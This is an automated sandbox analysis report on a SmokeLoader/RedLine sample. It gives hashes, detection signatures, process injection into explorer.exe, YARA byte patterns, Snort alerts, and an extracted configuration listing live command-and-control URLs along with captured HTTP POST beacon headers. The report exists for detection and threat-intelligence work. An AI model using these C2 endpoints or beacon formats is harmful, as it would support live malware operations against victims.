Edit tour

Windows Analysis Report
rBwTlpgnjc.exe

Overview

General Information

Sample name:	rBwTlpgnjc.exe renamed because original name is a hash value
Original sample name:	ee4e08febd22e594c7bcb70ea1b0252a.exe
Analysis ID:	1432077
MD5:	ee4e08febd22e594c7bcb70ea1b0252a
SHA1:	b1594033fa6e0377ccaea80d1556459128c61a13
SHA256:	3b6c00f64a1d047dfbed967d4fe8f320f4e4de9421a82d94dcb3eba07f23d939
Tags:	exeRedLineStealer
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to read the PEB

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

rBwTlpgnjc.exe (PID: 1268 cmdline: "C:\Users\user\Desktop\rBwTlpgnjc.exe" MD5: EE4E08FEBD22E594C7BCB70EA1B0252A)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

ivfjsrs (PID: 4428 cmdline: C:\Users\user\AppData\Roaming\ivfjsrs MD5: EE4E08FEBD22E594C7BCB70EA1B0252A)

ivfjsrs (PID: 7092 cmdline: C:\Users\user\AppData\Roaming\ivfjsrs MD5: EE4E08FEBD22E594C7BCB70EA1B0252A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nidoe.org/tmp/index.php", "http://sodez.ru/tmp/index.php", "http://uama.com.ua/tmp/index.php", "http://talesofpirates.net/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.2058699871.0000000004130000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2059007895.0000000004344000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7728:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.4450918361.0000000004136000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x6c90:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.2298449396.00000000041A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.2298381632.0000000004064000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x77f8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.2298532365.00000000041D1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2298532365.00000000041D1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.2298471164.00000000041B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2298471164.00000000041B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.2058891382.00000000042F1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2058891382.00000000042F1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000006.00000002.4451244629.0000000005C60000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Click to see the 9 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\ivfjsrs, CommandLine: C:\Users\user\AppData\Roaming\ivfjsrs, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ivfjsrs, NewProcessName: C:\Users\user\AppData\Roaming\ivfjsrs, OriginalFileName: C:\Users\user\AppData\Roaming\ivfjsrs, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\ivfjsrs, ProcessId: 4428, ProcessName: ivfjsrs

Snort Signatures

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	04/26/24-11:50:57.657192
SID:	2039103
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:48:53.977641
SID:	2039103
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:49:35.592735
SID:	2039103
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:49:00.896944
SID:	2039103
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	04/26/24-11:50:23.070925
SID:	2039103
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:47:23.987965
SID:	2039103
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:47:22.464464
SID:	2039103
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:47:29.304265
SID:	2039103
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	04/26/24-11:50:39.540792
SID:	2039103
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:48:43.367329
SID:	2039103
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:49:47.864493
SID:	2039103
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	04/26/24-11:50:11.655696
SID:	2039103
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:47:27.784659
SID:	2039103
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	04/26/24-11:50:44.236303
SID:	2039103
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	04/26/24-11:49:56.135562
SID:	2039103
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:48:46.715630
SID:	2039103
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:47:32.343784
SID:	2039103
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	04/26/24-11:50:28.180861
SID:	2039103
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:49:18.365467
SID:	2039103
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:47:25.556178
SID:	2039103
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:47:30.826079
SID:	2039103
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:47:20.949841
SID:	2039103
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	04/26/24-11:50:02.490715
SID:	2039103
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	04/26/24-11:50:32.759541
SID:	2039103
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:49:23.641505
SID:	2039103
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:48:57.550009
SID:	2039103
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:49:05.885669
SID:	2039103
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:48:50.067757
SID:	2039103
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	04/26/24-11:50:16.085964
SID:	2039103
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:49:30.712687
SID:	2039103
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:48:48.305830
SID:	2039103
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:48:55.896378
SID:	2039103
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:47:33.917741
SID:	2039103
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:49:12.723020
SID:	2039103
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	04/26/24-11:50:07.106115
SID:	2039103
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:48:44.986285
SID:	2039103
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:49:40.768533
SID:	2039103
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 119.204.11.2

Timestamp:	04/26/24-11:47:35.150965
SID:	2039103
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 190.187.52.42

Timestamp:	04/26/24-11:50:49.712608
SID:	2039103
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: rBwTlpgnjc.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://uama.com.ua/tmp/index.php	Avira URL Cloud: Label: malware
Source: http://talesofpirates.net/tmp/index.php	Avira URL Cloud: Label: malware
Source: http://sodez.ru/tmp/index.php	Avira URL Cloud: Label: malware
Source: http://nidoe.org/tmp/index.php	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\ivfjsrs

Avira: detection malicious, Label: HEUR/AGEN.1361904

Found malware configuration

Source: 00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nidoe.org/tmp/index.php", "http://sodez.ru/tmp/index.php", "http://uama.com.ua/tmp/index.php", "http://talesofpirates.net/tmp/index.php"]}

Multi AV Scanner detection for domain / URL

Source: nidoe.org	Virustotal: Detection: 19%	Perma Link
Source: http://talesofpirates.net/tmp/index.php	Virustotal: Detection: 17%	Perma Link
Source: http://sodez.ru/tmp/index.php	Virustotal: Detection: 20%	Perma Link
Source: http://nidoe.org/tmp/index.php	Virustotal: Detection: 21%	Perma Link
Source: http://uama.com.ua/tmp/index.php	Virustotal: Detection: 18%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\ivfjsrs

Virustotal: Detection: 44%

Perma Link

Multi AV Scanner detection for submitted file

Source: rBwTlpgnjc.exe

Virustotal: Detection: 44%

Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\ivfjsrs

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: rBwTlpgnjc.exe

Joe Sandbox ML: detected

Source: rBwTlpgnjc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: C:\xohayajixapeh mon-muvicupifujuja\rohagi_cedepamavosan.pdb source: rBwTlpgnjc.exe, ivfjsrs.2.dr
Source:	Binary string: C:\xohayajixapeh mon-muvicupifujuja\rohagi_cedepamavosan.pdb source: rBwTlpgnjc.exe, ivfjsrs.2.dr

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49711 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49712 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49713 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49714 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49715 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49716 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49717 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49718 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49719 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49720 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49722 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49723 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49724 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49725 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49726 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49727 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49728 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49729 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49730 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49731 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49732 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49733 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49734 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49735 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49736 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49737 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49738 -> 119.204.11.2:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49739 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49740 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49741 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49742 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49743 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49744 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49745 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49746 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49747 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49748 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49749 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49750 -> 190.187.52.42:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 190.187.52.42 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 119.204.11.2 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://nidoe.org/tmp/index.php
Source: Malware configuration extractor	URLs: http://sodez.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://uama.com.ua/tmp/index.php
Source: Malware configuration extractor	URLs: http://talesofpirates.net/tmp/index.php

Source: Joe Sandbox View

IP Address: 190.187.52.42 190.187.52.42

Source: Joe Sandbox View	ASN Name: AMERICATELPERUSAPE AMERICATELPERUSAPE
Source: Joe Sandbox View	ASN Name: KIXS-AS-KRKoreaTelecomKR KIXS-AS-KRKoreaTelecomKR

Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tkexntmwarsh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bxepraawugwqn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tjprilinnlddmg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dlytdgdqkjwsthka.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dlhsbtjkcsrywy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://guijonadpodebyqi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uhlohybvnslbwb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dnxsraqaaam.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jritymeowitfd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: nidoe.org
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ylocvbbjhcotul.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: nidoe.org
